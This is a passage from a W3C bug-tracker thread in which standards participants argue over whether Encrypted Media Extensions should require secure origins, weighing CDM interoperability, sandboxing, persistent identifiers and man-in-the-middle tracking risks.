Sure. If EME is ever going to be successful in anything other than vertical silos, then there will need to be some commonly supported CDMs.

> As such, it does not seem you can reasonably ignore or dismiss this
> issue, unless you believe that UA vendors should not ship interoperable CDMs.

You are talking apples and oranges. This issue (requiring HTTPS has nothing to do with interoperability).

> 
> 
> > > The
> > > closest approximation is the non-normative requirements in Section 6
> > > (Security) and 7 (Privacy) that "CDM implementors must provide sufficient
> > > information and controls to user agent implementers", but one can say that
> > > the exact same requirements exist for plugins via <object> today.
> > 
> > Not at all. There is no mechanism for UA implementors to obtain information
> > from NPAPI plugins as to their security and privacy properties. 
> 
> I'm not sure - are you suggesting that this exists for CDMs? Or is this
> merely a statement to the effect that "Since you can't do it for NPAPI, you
> don't need to do it for EME"?
> 
> > Nor is there
> > any established practice of UAs whitelisting only those plugins for which
> > the security and privacy properties are understood. 
> 
> There has been, for some time, such a practice.
> 
> http://www.chromium.org/developers/npapi-deprecation
> http://blogs.msdn.com/b/ie/archive/2011/02/28/activex-filtering-for-
> consumers.aspx
Comment 27 Ryan Sleevi 2014-08-19 17:44:44 UTC
(In reply to Glenn Adams from comment #26)
> (In reply to Ryan Sleevi from comment #25)
> > (In reply to Mark Watson from comment #24)
> > > No, but there is no need for anyone to do such an analysis. The UAs
> > > implementing EME all know what CDMs they are integrating with and their
> > > security and privacy properties. 
> > 
> > In the W3C, there has been a priority of constituentcies that inherently
> > recognizes the reality of multiple stakeholders being party to the
> > conversations. Users, developers/authors, implementers are all part of the
> > equation.
> > 
> > It sounds like you are stating that only UAs can or should be part of the
> > security and privacy analysis, and that seems to run counter to the W3C's
> > goals of being an open and transparent organization.
> 
> To the extent that UAs do not support user installable CDMs, then Mark is
> correct.
> 
> In any case, what UAs do with CDMs has no bearing on the W3C as an "open and
> transparent organization".

Glenn,

You cannot say that the spec doesn't support user-installable CDMs, and then later say it's up to the UA.

The point is that the *spec* provides no such guarantees OR restrictions, in which case, evaluating the *spec*'s privacy and security considerations cannot be done, because there is information and context lacking.

This absolutely affects the ability of the W3C to adequately review and understand the spec, as withholding details ("It's up to the CDM"), with no definition for how those CDMs are evaluated, AND with the express statement that CDMs can only be evaluated by UAs, directly prevents those interested in privacy and security from providing meaningful feedback as to how the spec guarantees or inhibits these.

> Whether CDMs are an open plugin API or not is the decision of the UA vendor.

This may be, but it has direct bearing on the interoperability and applicability of this spec.

> The spec will not place requirements on UAs with respect to how they choose
> to support CDMs. If you would like to write another spec that does so, then
> you may draft and submit it for consideration.

This response fails to address the original issue which Mark was deflecting. It entirely be the view of the WG that you choose to fail to address this, in which case, it should be unsurprising if objections are raised.

This is an opportunity to improve the spec. Let's take it.

> Mark is not stating that it is intentional. At this point, it is just a
> historical fact, not predicated or influenced by the spec.

This is odd, because you just stated as much in the above quoted reply. It's absolutely influenced by the spec and whether or not it will or will not place normative requirements, and the absence of these requirements affects the ability to review the security, privacy, and interoperability guarantees of the spec.

> CDMs operate as an integral (or integrated) part of a UA; 

"The spec will not place requirements on UAs with respect to how they choose to support CDMs"

These two statements are in conflict. Either it's an integrated, integral part of a UA, or it's not.

> > > I don't think we have had such a disagreement as no two UA vendors are
> > > presently integrating the same CDM.
> > 
> > I don't feel this satisfactorily deals with the issue, unless you believe
> > that a lack of interoperability is a goal or feature of this specification.
> 
> Nobody thinks that lack of interoperability is a goal or feature. That's
> just a silly statement.

Then you can't deflect an interoperability concern with the response "Well, it's not a concern because there isn't interoperability".

If interoperability is a concern, then this is an issue, and it has to be dealt with. The only reasonable reason not to deal with it if interoperability is not a goal.

> > As such, it does not seem you can reasonably ignore or dismiss this
> > issue, unless you believe that UA vendors should not ship interoperable CDMs.
> 
> You are talking apples and oranges. This issue (requiring HTTPS has nothing
> to do with interoperability).

If only this were the case!

If I, as an author, which to use EME on my page - an EME CDM that is implemented by multiple UAs (since we say interoperability is a goal) - then what do I, as an author, need to do to enable this?

Can I deploy it over HTTP and be assured it will work by all UAs that implement the CDM and conform to the spec?

The answer is certainly no.

If I deploy CDM A, which works with UA A, and then later choose CDM B, which works with UA's B and C, where CDM A/UA A worked over HTTP, can I be assured that my switch to CDM B, fully conforming to this spec, will work?

The answer is certainly no.

These are real interoperability concerns. Whether or not this API works over insecure transports and insecure origins, whether or not it sufficiently protects privacy, these are all things authors and implementors have to consider.

Failing to say anything is to require HTTP be supported, which is unquestionably harmful to security and privacy.
Failing to require HTTPS is equally a failure to guarantee interoperability according to the spec.
Comment 28 Mark Watson 2014-08-19 17:58:09 UTC
I would have no objection to a requirement that arbitrary non-sandboxed user-installable CDMs may only be installed with user consent and from a secure origin. That makes complete sense, because the UA has no idea what that thing is and the user needs to know who they are being asked to trust.

But if the UA is fully aware of the CDM properties and/or aware of the properties of the sandbox, if the CDM is integrated in the UA (not downloaded by the site) then it is the UA, not the site, that the user is being asked to trust and the situation is very different.
Comment 29 Joe Steele 2014-08-19 18:02:32 UTC
(In reply to Ryan Sleevi from comment #25)
> It would seem, based on the significant feedback from the community, that
> having two or more UA vendors ship the same CDM is a highly desirable
> outcome. As such, it does not seem you can reasonably ignore or dismiss this
> issue, unless you believe that UA vendors should not ship interoperable CDMs.

I certainly support the idea of multiple UA vendors shipping the same CDM (or at least CDMs from the sam vendor). I also support having the EME functionality being interoperable across CDMs where possible.
Comment 30 Joe Steele 2014-08-19 18:07:55 UTC
(In reply to Glenn Adams from comment #26)
> (In reply to Ryan Sleevi from comment #25)
> The spec will not place requirements on UAs with respect to how they choose
> to support CDMs. If you would like to write another spec that does so, then
> you may draft and submit it for consideration.

I don't think the W3C is the appropriate forum for that spec. However I would like to be a party to that process if someone does start it. There are at least three APIs to choose from to date: Microsoft CDMi, Google Pepper CDM, Firefox GMP. 

However given that none of the UA vendors so far has indicated that they would allow a plugin written to these APIs to be accessed from the UA without some prior relationship with the UA vendor, I wonder about the value of such a spec.
Comment 31 Glenn Adams 2014-08-19 18:32:56 UTC
(In reply to Ryan Sleevi from comment #27)
> (In reply to Glenn Adams from comment #26)
> > (In reply to Ryan Sleevi from comment #25)
> > > (In reply to Mark Watson from comment #24)
> > > > No, but there is no need for anyone to do such an analysis. The UAs
> > > > implementing EME all know what CDMs they are integrating with and their
> > > > security and privacy properties. 
> > > 
> > > In the W3C, there has been a priority of constituentcies that inherently
> > > recognizes the reality of multiple stakeholders being party to the
> > > conversations. Users, developers/authors, implementers are all part of the
> > > equation.
> > > 
> > > It sounds like you are stating that only UAs can or should be part of the
> > > security and privacy analysis, and that seems to run counter to the W3C's
> > > goals of being an open and transparent organization.
> > 
> > To the extent that UAs do not support user installable CDMs, then Mark is
> > correct.
> > 
> > In any case, what UAs do with CDMs has no bearing on the W3C as an "open and
> > transparent organization".
> 
> Glenn,
> 
> You cannot say that the spec doesn't support user-installable CDMs, and then
> later say it's up to the UA.

Sure you can. The spec is silent on whether a CDM is user-installable or not. Therefore, it is up to the UA.

> 
> The point is that the *spec* provides no such guarantees OR restrictions

So? No W3C spec provides any guarantee... the W3C does not certify products that implement its specifications.

, in
> which case, evaluating the *spec*'s privacy and security considerations
> cannot be done, because there is information and context lacking.

Sure it can (evaluate). And yes, it will never be complete, because information and context is always lacking (from any spec). Only an implementation of the spec can be fully evaluated.


> 
> This absolutely affects the ability of the W3C to adequately review and
> understand the spec,

Sure it does. And that is by design. CDMs are explicitly out of scope of EME.

Your problem is that you don't seem to agree with this decision. But it holds and will not be changed.

> as withholding details ("It's up to the CDM"),

There is no "withholding details". There are simply "implementation details that are out of scope". You are talking to the wrong people. If you want to do a security and privacy analysis of a CDM in a specific UA then you need to be talking to the CDM and UA vendor. Your comments are misdirected if you think they will be addressed by EME.

> with no
> definition for how those CDMs are evaluated, AND with the express statement
> that CDMs can only be evaluated by UAs, directly prevents those interested
> in privacy and security from providing meaningful feedback as to how the
> spec guarantees or inhibits these.

W3C specs do not guarantee or restrict UA behavior. They may do whatever they want, and in fact, they do.

> 
> > Whether CDMs are an open plugin API or not is the decision of the UA vendor.
> 
> This may be, but it has direct bearing on the interoperability and
> applicability of this spec.

The same statement can be made for every W3C specification. For example, the HTML5 specification does not require support for: JavaScript, CSS, any specific image or media format, and a myriad of other features.

> 
> > The spec will not place requirements on UAs with respect to how they choose
> > to support CDMs. If you would like to write another spec that does so, then
> > you may draft and submit it for consideration.
> 
> This response fails to address the original issue which Mark was deflecting.
> It entirely be the view of the WG that you choose to fail to address this,
> in which case, it should be unsurprising if objections are raised.

The WG is not going to revisit the decision of determining that CDM details are out-of-scope. You can object, but it will serve no purpose.

> 
> This is an opportunity to improve the spec. Let's take it.

No and No. It will not improve the spec (and in fact will damage it). And No the WG will not revisit the decision that CDMs are out of scope.

> 
> > Mark is not stating that it is intentional. At this point, it is just a
> > historical fact, not predicated or influenced by the spec.
> 
> This is odd, because you just stated as much in the above quoted reply.

You said:

> Your statement
> - which is that CDMs are UA-specific - would seem to support an
> intentionally far less interoperable view than many W3C members have
> realized.

This pertains to whether UAs are intentionally UA-specific or not. Mark was not saying that "UAs are intentionally UA-specific". If they are (at the moment) then that is a historical coincidence and has no necessary relation to the spec or future implementations.

> It's
> absolutely influenced by the spec and whether or not it will or will not
> place normative requirements, and the absence of these requirements affects
> the ability to review the security, privacy, and interoperability guarantees
> of the spec.

Sure. But you are merely stating the obvious: "that not defining CDMs means that the security and privacy consideration of CDMs cannot be evaluated". That is a consequence of ruling that CDM details are out of scope of EME. That can't be helped.

> 
> > CDMs operate as an integral (or integrated) part of a UA; 
> 
> "The spec will not place requirements on UAs with respect to how they choose
> to support CDMs"
> 
> These two statements are in conflict. Either it's an integrated, integral
> part of a UA, or it's not.

No these statements are not in conflict. If a CDM is integrated, then the UA ships with the CDM. If a CDM is from a 3rd party and can be installed after the UA ships, then it is not integrated. The spec doesn't restrict whether a UA supports only one or both of these models. The spec only requires that every implementation of EME provide an integrated CDM that implements the org.w3.clearkey key system. Beyond that, it is up to a UA vendor.

> 
> > > > I don't think we have had such a disagreement as no two UA vendors are
> > > > presently integrating the same CDM.
> > > 
> > > I don't feel this satisfactorily deals with the issue, unless you believe
> > > that a lack of interoperability is a goal or feature of this specification.
> > 
> > Nobody thinks that lack of interoperability is a goal or feature. That's
> > just a silly statement.
> 
> Then you can't deflect an interoperability concern with the response "Well,
> it's not a concern because there isn't interoperability".
> 
> If interoperability is a concern, then this is an issue, and it has to be
> dealt with. The only reasonable reason not to deal with it if
> interoperability is not a goal.

You seem to imply that interoperability is black or white. Interoperability is always a gray scale. One of the levels of interoperability is whether the publicly defined EME interfaces interoperate under certain constraints. Another level is whether and end-to-end media stream will interoperate between a given server and distinct UA (and CDM) implementations. The former is clearly in scope for EME; the latter is clearly not in scope. You seem to be wanting to make the latter in-scope, but it isn't: by definition.

> 
> > > As such, it does not seem you can reasonably ignore or dismiss this
> > > issue, unless you believe that UA vendors should not ship interoperable CDMs.
> > 
> > You are talking apples and oranges. This issue (requiring HTTPS has nothing
> > to do with interoperability).
> 
> If only this were the case!
> 
> If I, as an author, which to use EME on my page - an EME CDM that is
> implemented by multiple UAs (since we say interoperability is a goal) - then
> what do I, as an author, need to do to enable this?

I fully agree with you, and wearing my hat as a service provider member (Cox Communications) this is also our major concern for EME. However, we recognize that their are boundaries of what EME can and should define and this has to be considered in the wider context of the fact that the W3C does not publish conformance tests and does not assess the compliance of implementations.

> 
> Can I deploy it over HTTP and be assured it will work by all UAs that
> implement the CDM and conform to the spec?
> 
> The answer is certainly no.

Agreed. But you will never get such a guarantee in the context of W3C. Go start and fund a consortium to publish and perform compliance tests, then award labels to products that pass. After you do that, let us know how it turns out.

> 
> If I deploy CDM A, which works with UA A, and then later choose CDM B, which
> works with UA's B and C, where CDM A/UA A worked over HTTP, can I be assured
> that my switch to CDM B, fully conforming to this spec, will work?
> 
> The answer is certainly no.

No argument here. But this is not relevant to this issue.

> 
> These are real interoperability concerns. Whether or not this API works over
> insecure transports and insecure origins, whether or not it sufficiently
> protects privacy, these are all things authors and implementors have to
> consider.

Sure.

> 
> Failing to say anything is to require HTTP be supported

No it isn't.

>, which is
> unquestionably harmful to security and privacy.
> Failing to require HTTPS is equally a failure to guarantee interoperability
> according to the spec.

Requiring HTTPS does not guarantee interoperability.
Comment 32 Glenn Adams 2014-08-19 18:35:51 UTC
(In reply to Glenn Adams from comment #31)
> (In reply to Ryan Sleevi from comment #27)
> You said:
> 
> > Your statement
> > - which is that CDMs are UA-specific - would seem to support an
> > intentionally far less interoperable view than many W3C members have
> > realized.
> 
> This pertains to whether UAs are intentionally UA-specific or not. Mark was
> not saying that "UAs are intentionally UA-specific". If they are (at the
> moment) then that is a historical coincidence and has no necessary relation
> to the spec or future implementations.

s/UAs are intentionally/CDMs are intentionally/g
Comment 33 Glenn Adams 2014-08-19 19:18:46 UTC
(In reply to Joe Steele from comment #30)
> (In reply to Glenn Adams from comment #26)
> > (In reply to Ryan Sleevi from comment #25)
> > The spec will not place requirements on UAs with respect to how they choose
> > to support CDMs. If you would like to write another spec that does so, then
> > you may draft and submit it for consideration.
> 
> I don't think the W3C is the appropriate forum for that spec.

I wouldn't disagree, but that doesn't prevent someone from offering a draft here.

> However I
> would like to be a party to that process if someone does start it. There are
> at least three APIs to choose from to date: Microsoft CDMi, Google Pepper
> CDM, Firefox GMP. 
> 
> However given that none of the UA vendors so far has indicated that they
> would allow a plugin written to these APIs to be accessed from the UA
> without some prior relationship with the UA vendor, I wonder about the value
> of such a spec.

That's a separate issue.
Comment 34 David Dorwin 2014-08-19 21:02:28 UTC
This is off topic, but for the record:

(In reply to Ryan Sleevi from comment #25)
> (In reply to Mark Watson from comment #24)
> > This is not an open plugin API with user-installable CDMs.
> 
> While I appreciate you making this point, I feel that this is just your
> opinion. Both of your co-editors, and their respective organizations, have
> positioned EME/CDM as precisely that, both in public discussions and, on a
> more practical matter, within the code itself.

I don't believe this is true (for me and Google, at least).

...
> On Google's side, EME/CDM is exposed through the Pepper plugin interface,
> Google's replacement for NPAPI. Indeed, even the existing EME
> implementations in Chrome are progrmatically no different than generic
> plugins.

This is not an accurate description of Chrome's implementation. On desktop platforms, Chrome hosts CDMs in a Pepper process. However, this is an internal implementation detail and the interface to the CDM is actually different. Also, it is not possible to add a key system by installing a "plugin".
Comment 35 David Dorwin 2014-08-19 21:05:46 UTC
(In reply to Glenn Adams from comment #26)
> A user that entirely relies upon a UA to "assuage their privacy concerns" is
> simply ignorant of the risks that exist in either the pre-EME world of media
> or the EME world. EME and CDMs don't change this fact.

Many users do assume user agents are doing what they can to protect the user's privacy, and user agents are continuously implementing features to address (emerging) threats.

(In reply to Glenn Adams from comment #31)
> Sure it does. And that is by design. CDMs are explicitly out of scope of EME.

> That is a consequence of ruling that CDM details are out of scope of EME.
> That can't be helped.

I think it is incorrect to say that all CDM details are out of scope. The spec currently leaves robustness, license exchange, etc. undefined, but there are some requirements on the CDM's behavior in the normative algorithms and we are discussing others to improve interoperability.

> The WG is not going to revisit the decision of determining that CDM details
> are out-of-scope. You can object, but it will serve no purpose.

> No and No. It will not improve the spec (and in fact will damage it). And No
> the WG will not revisit the decision that CDMs are out of scope.

These are opinions It's not possible to make such absolute statements about what the HTML WG might do.

> Sure. But you are merely stating the obvious: "that not defining CDMs means
> that the security and privacy consideration of CDMs cannot be evaluated".
> That is a consequence of ruling that CDM details are out of scope of EME.
> That can't be helped.

Even if one assumes the CDM details are out of scope, the spec can mitigate issues through normative requirements on the user agents - that is what is being discussed here.
Comment 36 David Dorwin 2014-08-19 21:21:07 UTC
It has been argued that user agents will do what is right (for the CDMs they support) and that there is therefore no need to require HTTPS. I do not believe this would be true in practice.

I think it is unlikely that most user agent implementors will have access to or seek out the information necessary to make the correct decision. (Think beyond the major browser vendors.) I think the spec can and should try to avoid such judgement calls on important issues.

Furthermore, suppose that a user agent implementor does not feel comfortable with the capabilities of the CDM (i.e. one built into the platform). They _could_ choose to require HTTPS, but if all other implementations have not made that requirement, the user agent will likely be limited to a small set of content providers that support HTTPS. Instead, that implementor will probably expose the CDM to HTTP anyway, resulting in exactly the problems we are trying to avoid. As I said above, "it is likely that the only way to actually address the issue is to normatively require secure origins..."


Much of the discussion has focused on identities, but there are other concerns as well. For example, DRM implementations, especially those provided by the platform, are often unsandboxed. This means that such CDMs could access anything on the system and it are particularly dangerous because they run outside the sandbox. Given these risks and the unique nature of EME/CDMs compared to other web APIS, it makes sense that such risks should be restricted to authenticated domains.

Other potential mitigations to these risks (i.e. prompt the user) are also non-normative, so we cannot rely on those. Even if we made user prompts normative, the benefit is minimized if non-secure origins are supported (see [1] in comment #0).
Comment 37 Glenn Adams 2014-08-19 21:43:52 UTC
(In reply to David Dorwin from comment #35)
> (In reply to Glenn Adams from comment #31)
> > Sure it does. And that is by design. CDMs are explicitly out of scope of EME.
> 
> > That is a consequence of ruling that CDM details are out of scope of EME.
> > That can't be helped.
> 
> I think it is incorrect to say that all CDM details are out of scope.

The kinds of details being discussed here are out of scope, i.e., sufficient details to perform a full security/privacy analysis.

> > No and No. It will not improve the spec (and in fact will damage it). And No
> > the WG will not revisit the decision that CDMs are out of scope.
> 
> These are opinions It's not possible to make such absolute statements about
> what the HTML WG might do.

I just did (make such a statement). I predict it is true and will remain true.
Comment 38 Joe Steele 2014-08-19 22:03:10 UTC
Putting aside the dangers of CDMs running un-sandboxed code, I am not convinced that this change would result in much better privacy. 

This would secure network communications against man-in-the-middle snooping at the potential expense of usability on some browsers. But the information would still be provided to the origin that requested it. 

From a practical point of view, getting you to visit my secure (but rogue) domain is much easier than getting between you and a legitimate server (secure or not). 

So if there were a "rogue" CDM that leaks an insecure permanent user identifier -- it could still do that. 

I think having guidelines for what UAs should watch out for before agreeing to include a potentially "rogue" CDM is a better approach.
Comment 39 Ryan Sleevi 2014-08-19 22:16:50 UTC
(In reply to Joe Steele from comment #38)
> Putting aside the dangers of CDMs running un-sandboxed code, I am not
> convinced that this change would result in much better privacy. 
> 
> This would secure network communications against man-in-the-middle snooping
> at the potential expense of usability on some browsers. But the information
> would still be provided to the origin that requested it. 
> 
> From a practical point of view, getting you to visit my secure (but rogue)
> domain is much easier than getting between you and a legitimate server
> (secure or not). 
> 
> So if there were a "rogue" CDM that leaks an insecure permanent user
> identifier -- it could still do that. 
> 
> I think having guidelines for what UAs should watch out for before agreeing
> to include a potentially "rogue" CDM is a better approach.

I think you're conflating two things.

Allowed on an insecure origin, any MITM can themselves play as a rogue CDM. That is, even if you prompted and included a rogue CDM, network-level attackers (of which there are many, and increasing, as evidence shows) should not be able to infer or extract tracing data from it.

I absolutely agree that an evil origin could collude with a rogue CDM to track the user. That's covered in the security properties. What isn't covered is the fact that any evil network can collude with a rogue CDM - or the fact that a "rogue CDM" is an abstract concept that it seems some are committed to declaring "out of scope", ergo by definition, "not rogue".
Comment 40 Mark Watson 2014-08-19 22:30:35 UTC
(In reply to David Dorwin from comment #36)
> 
> 
> Much of the discussion has focused on identities, but there are other
> concerns as well. For example, DRM implementations, especially those
> provided by the platform, are often unsandboxed. This means that such CDMs
> could access anything on the system and it are particularly dangerous
> because they run outside the sandbox. Given these risks and the unique
> nature of EME/CDMs compared to other web APIS, it makes sense that such
> risks should be restricted to authenticated domains.

Why is a platform CDM API any different from any other platform API in this respect ?

> 
> Other potential mitigations to these risks (i.e. prompt the user) are also
> non-normative, so we cannot rely on those. Even if we made user prompts
> normative, the benefit is minimized if non-secure origins are supported (see
> [1] in comment #0).

There are many examples where UA implementors - and everyone else - agree that a user prompt is necessary but no such prompt is normatively required by W3C specifications. We don't generally specify such UI issues, but that does not mean that we should behave as if they do not exist and adopt unnecessary restrictions as a result.
Comment 41 Joe Steele 2014-08-19 22:35:15 UTC
(In reply to Ryan Sleevi from comment #39)
> (In reply to Joe Steele from comment #38)
> > Putting aside the dangers of CDMs running un-sandboxed code, I am not
> > convinced that this change would result in much better privacy. 
> > 
> > This would secure network communications against man-in-the-middle snooping
> > at the potential expense of usability on some browsers. But the information
> > would still be provided to the origin that requested it. 
> > 
> > From a practical point of view, getting you to visit my secure (but rogue)
> > domain is much easier than getting between you and a legitimate server
> > (secure or not). 
> > 
> > So if there were a "rogue" CDM that leaks an insecure permanent user
> > identifier -- it could still do that. 
> > 
> > I think having guidelines for what UAs should watch out for before agreeing
> > to include a potentially "rogue" CDM is a better approach.
> 
> I think you're conflating two things.

What are the two things you think I am conflating?

> 
> Allowed on an insecure origin, any MITM can themselves play as a rogue CDM.

I don't understand what you mean here. Are you talking about a MITM injecting script into the application? (this is feasible) Or are you talking about a MITM injecting a rogue CDM? (this is less feasible, but if we are stipulating an untrustworthy UA anything is possible)

> That is, even if you prompted and included a rogue CDM, network-level
> attackers (of which there are many, and increasing, as evidence shows)
> should not be able to infer or extract tracing data from it.

My point is that we are better off asking UAs to prevent rogue CDMs than requiring UAs to implement security half-measures against what they might do. 

> 
> I absolutely agree that an evil origin could collude with a rogue CDM to
> track the user. That's covered in the security properties. What isn't
> covered is the fact that any evil network can collude with a rogue CDM - or
> the fact that a "rogue CDM" is an abstract concept that it seems some are
> committed to declaring "out of scope", ergo by definition, "not rogue".
Comment 42 Ryan Sleevi 2014-08-19 22:44:40 UTC
(In reply to Joe Steele from comment #41)
> (In reply to Ryan Sleevi from comment #39)
> > I think you're conflating two things.
> 
> What are the two things you think I am conflating?

"Rogue" CDMs and rogue intermediates.

I'm not sure I agree with the classification that there even is a "rogue CDM" - it's clear from the CDMs already in existence that certain privacy properties (or lack) are by-design of the CDM. Ergo, they're behaving exactly as that CDM should - but in a way that is detrimental to the user.

The issue is that any intermediate can, for unprotected traffic, inject script to use that CDM and report to an arbitrary party those results. That's just how the web works.

Even if you normatively required prompting, any site which the user had accepted (and I think we know what some of those sites those will, in practice, be, given their representatives participation in the spec and this WG) can be intercepted and used to track.

And it's not just when a UA visits one of these video sites - through the power of the web (read iframe and related), an 'attacker' (hostile intermediate) can inject the compromised video site into any site of the attackers choosing. This was David's point [1] from the original report.

None of this has anything to do with "rogue CDMs". It's an inherent property of the spec, and has nothing to do with "preventing rogue CDMs", but fundamentally about protecting users.
Comment 43 David Dorwin 2014-08-19 23:19:41 UTC
(In reply to Mark Watson from comment #40)
> (In reply to David Dorwin from comment #36)
> > 
> > 
> > Much of the discussion has focused on identities, but there are other
> > concerns as well. For example, DRM implementations, especially those
> > provided by the platform, are often unsandboxed. This means that such CDMs
> > could access anything on the system and it are particularly dangerous
> > because they run outside the sandbox. Given these risks and the unique
> > nature of EME/CDMs compared to other web APIS, it makes sense that such
> > risks should be restricted to authenticated domains.
> 
> Why is a platform CDM API any different from any other platform API in this
> respect ?

The data that is extracted is opaque and sent to the application without any ability for the user agent to verify its contents (vs. location coordinates from a geolocation API, for example). CDMs are also generally more likely to be non-inspectable.

As one example, I believe some user agents validate WebGL commands before passing them to the GPU.

Many web APIs that expose platform functionality also normatively consider user authorization. This includes getUserMedia() and Web MIDI. There is also regret by some that the geolocation API was not restricted to secure origins "before it became too late."

> > Other potential mitigations to these risks (i.e. prompt the user) are also
> > non-normative, so we cannot rely on those. Even if we made user prompts
> > normative, the benefit is minimized if non-secure origins are supported (see
> > [1] in comment #0).
> 
> There are many examples where UA implementors - and everyone else - agree
> that a user prompt is necessary but no such prompt is normatively required
> by W3C specifications. We don't generally specify such UI issues, 

Counterexamples: getUserMedia() and Web MIDI

> but that
> does not mean that we should behave as if they do not exist and adopt
> unnecessary restrictions as a result.

As I said (and Ryan expands on in comment #42), prompts are insufficient on non-secure origins.

(In reply to Joe Steele from comment #41)
> My point is that we are better off asking UAs to prevent rogue CDMs than
> requiring UAs to implement security half-measures against what they might
> do. 

Reiterating what Ryan said, the concern is not necessarily about "rogue CDMS", it is about limiting the damage that is possible when exposing a CDM that uses permanent identifiers, is not fully sandboxed, etc.
Comment 44 Mark Watson 2014-08-20 00:04:36 UTC
(In reply to David Dorwin from comment #43)
> (In reply to Mark Watson from comment #40)
> > (In reply to David Dorwin from comment #36)

> 
> Reiterating what Ryan said, the concern is not necessarily about "rogue
> CDMS", it is about limiting the damage that is possible when exposing a CDM
> that uses permanent identifiers, is not fully sandboxed, etc.

So why not apply the restriction only to such CDMs ? Why should the restriction apply to CDMs that do not expose permanent identifiers and/or are fully sandboxed ?
Comment 45 David Dorwin 2014-08-20 00:13:03 UTC
(In reply to Mark Watson from comment #44)
> (In reply to David Dorwin from comment #43)
> > (In reply to Mark Watson from comment #40)
> > > (In reply to David Dorwin from comment #36)
> 
> > 
> > Reiterating what Ryan said, the concern is not necessarily about "rogue
> > CDMS", it is about limiting the damage that is possible when exposing a CDM
> > that uses permanent identifiers, is not fully sandboxed, etc.
> 
> So why not apply the restriction only to such CDMs ? Why should the
> restriction apply to CDMs that do not expose permanent identifiers and/or
> are fully sandboxed ?

That is essentially possible option 2 in comment #0. As mentioned there and elsewhere, I think relying on such judgement calls will fail in practice.
Comment 46 Joe Steele 2014-08-20 23:14:59 UTC
(In reply to Ryan Sleevi from comment #42)
> (In reply to Joe Steele from comment #41)
> > (In reply to Ryan Sleevi from comment #39)
> > > I think you're conflating two things.
> > 
> > What are the two things you think I am conflating?
> 
> "Rogue" CDMs and rogue intermediates.
> 
> I'm not sure I agree with the classification that there even is a "rogue
> CDM" - it's clear from the CDMs already in existence that certain privacy
> properties (or lack) are by-design of the CDM. Ergo, they're behaving
> exactly as that CDM should - but in a way that is detrimental to the user.

When I am referring to "rogue" CDMs, I am specifically referring to CDMs that could negatively impact user privacy in the ways described by Section 7 "Privacy Considerations". 

It is not clear to me at least that the CDMs that exist today are behaving in a way that is detrimental to the user. Do you have a specific example in mind?

> The issue is that any intermediate can, for unprotected traffic, inject
> script to use that CDM and report to an arbitrary party those results.
> That's just how the web works.

I agree with you here. But I believe we have locked down the information that a CDM conforming to the privacy guidelines can provide to such a degree that the available information for disclosure here is no worse than any web application using cookies. I don't believe that this type of disclosure is enough reason for this API to be held to a higher standard for conforming CDMs. 

With regard to non-conforming or "rogue" CDMs, since the UA is in the position of trust with the user it is up to the UA to make the determination of what CDM's to include and how to enforce the necessary constraints. If you believe that "rogue" CDMs should only be loaded on secure domains, I would be ok with that, but I suspect UAs would just refuse to load any CDMs they consider to be "rogue".

(In reply to David Dorwin from comment #43)
> (In reply to Joe Steele from comment #41)
> > My point is that we are better off asking UAs to prevent rogue CDMs than
> > requiring UAs to implement security half-measures against what they might
> > do. 
> 
> Reiterating what Ryan said, the concern is not necessarily about "rogue
> CDMS", it is about limiting the damage that is possible when exposing a CDM
> that uses permanent identifiers, is not fully sandboxed, etc.

I would consider a CDM that exposed permanent, non-blinded identifiers to be a "rogue". However exposing an identifier that is no more privacy damaging than a cookie does not seem like a concern to me, although some may disagree. Sandboxing is in the purview of the UA, not the CDM. If the UA is not sandboxing CDMs and has agreed to load a CDM with known bad behaviors, then I would expect users that are informed and concerned will avoid that UA.
Comment 47 Ryan Sleevi 2014-08-20 23:37:15 UTC
(In reply to Joe Steele from comment #46)
> When I am referring to "rogue" CDMs, I am specifically referring to CDMs
> that could negatively impact user privacy in the ways described by Section 7
> "Privacy Considerations". 

None of these are normative.
Calling them rogue CDMs is thus something that the spec doesn't really support.

> 
> It is not clear to me at least that the CDMs that exist today are behaving
> in a way that is detrimental to the user. Do you have a specific example in
> mind?

A hardware identifier is, in some circles (both UAs and users), viewed as detrimental to the user, blinded or not.


> > The issue is that any intermediate can, for unprotected traffic, inject
> > script to use that CDM and report to an arbitrary party those results.
> > That's just how the web works.
> 
> I agree with you here. But I believe we have locked down the information
> that a CDM conforming to the privacy guidelines can provide to such a degree
> that the available information for disclosure here is no worse than any web
> application using cookies. I don't believe that this type of disclosure is
> enough reason for this API to be held to a higher standard for conforming
> CDMs.

Respectfully, I disagree, and I'm sure most members of most security teams for most user agents would agree as well.

Cookies are hardly a shining example of where we got privacy right. It took years for the "secure" flag to be introduced for cookies. User Agents are already looking at ways to reduce or prohibit cookies via HTTP.

When analyzing security considerations, it's not sufficient to say something is "not worse" than that other thing - it's a question of whether we can and should do better. And the lesson from cookies - reiterated time and time again, is that yes, we should.

This is not merely academic or ideological, nor is it specifically tied to non-blinded identifiers. Reports and disclosures of nation-state monitoring and espionage have included detailed descriptions of how blinded, purely random identifiers delivered via cookies are being used to target users. Introducing yet another means for users to be attacked (as the community has agreed it is, via BCP 188) is simply unnecessary.
 
> I would consider a CDM that exposed permanent, non-blinded identifiers to be
> a "rogue". However exposing an identifier that is no more privacy damaging
> than a cookie does not seem like a concern to me, although some may
> disagree.

We have enough evidence to make strongly establish that this is indeed privacy damaging.

Additionally, the mitigations of Section 7, non-normative as they are, still force users to make tradeoffs between security and privacy.

That is, while you can point and suggest that a UA may generate a blinding factor when a user "clears their cookies", we know that few users do, and we know there are significant security benefits for the users that DON'T (reducing the typing of passwords, increasing the use of password managers, etc). We also know in practice that content providers are particularly hostile to users who employ these methods to preserve their privacy - often practically limiting the number of times a user may clear such identifiers. I (personally) regret to say that both Google and Netflix are among those that impose such limits, and I think it'd be hard to call us "rogue" in that respect.

Thus, while they exist as mitigations on paper, we know in practice that they're insufficient, and users' will likely have these identifiers that last for years at a time.

As a reminder, it's an entirely orthogonal issue as to whether two SITES receive the same identifier. An attacker in a privileged position on the network (as we have strong evidence of a number of nation-states and hostile entities being just that) can exploit a single site to obtain a persistent identifier to track that user as they browse and navigate.

When thinking about how best to protect privacy and security of users, our goal should not be the minimum possible ("how it is today"), but looking at how we can maximize this, while balancing risks ("how we SHOULD do it"). Cookies have proven time and time again that we SHOULD do secure transports.
Comment 48 Henri Sivonen 2014-08-21 11:18:50 UTC
Instead of using a term like "rogue" when different people might have a different threshold of what behavior counts as "rogue", I think it would be more productive to state which attacks specifically you'd like to defend against.

Here are some attacks I can think of:

